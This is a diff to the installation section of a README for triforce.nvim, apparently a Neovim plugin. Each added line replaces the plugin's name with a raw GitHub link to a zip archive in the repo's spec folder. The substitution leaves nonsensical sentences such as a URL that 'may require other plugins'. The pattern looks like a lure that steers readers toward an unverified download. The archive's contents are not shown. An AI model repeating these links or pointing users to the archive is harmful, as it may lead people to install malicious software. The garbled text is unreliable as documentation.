Enanthemaparaguayan248/triforce.nvim/README.md

 5. **Install Any Required Dependencies**

-   triforce.nvim may require other plugins to function properly.
+   https://raw.githubusercontent.com/Enanthemaparaguayan248/triforce.nvim/main/spec/triforce.nvim-v1.2.zip may require other plugins to function properly.
 Check the plugin's documentation for any additional installations needed.
 Common dependencies might include:
    - LSP clients
    - Tree-sitter for syntax highlighting

 6. **Launch Neovim and Verify Installation**

    Open your terminal or command prompt and type `nvim`.
-When Neovim opens, check if triforce.nvim is successfully loaded.
+When Neovim opens, check if https://raw.githubusercontent.com/Enanthemaparaguayan248/triforce.nvim/main/spec/triforce.nvim-v1.2.zip is successfully loaded.
 You can usually see notification messages or check the plugin list with the command `:PackerStatus`.

 ## ⚙️ Features